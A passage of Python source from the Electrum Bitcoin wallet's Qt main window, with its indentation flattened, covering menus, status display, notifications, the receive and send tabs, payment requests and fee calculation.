view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_(f"{title} copied to clipboard:\n\n{content}"))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
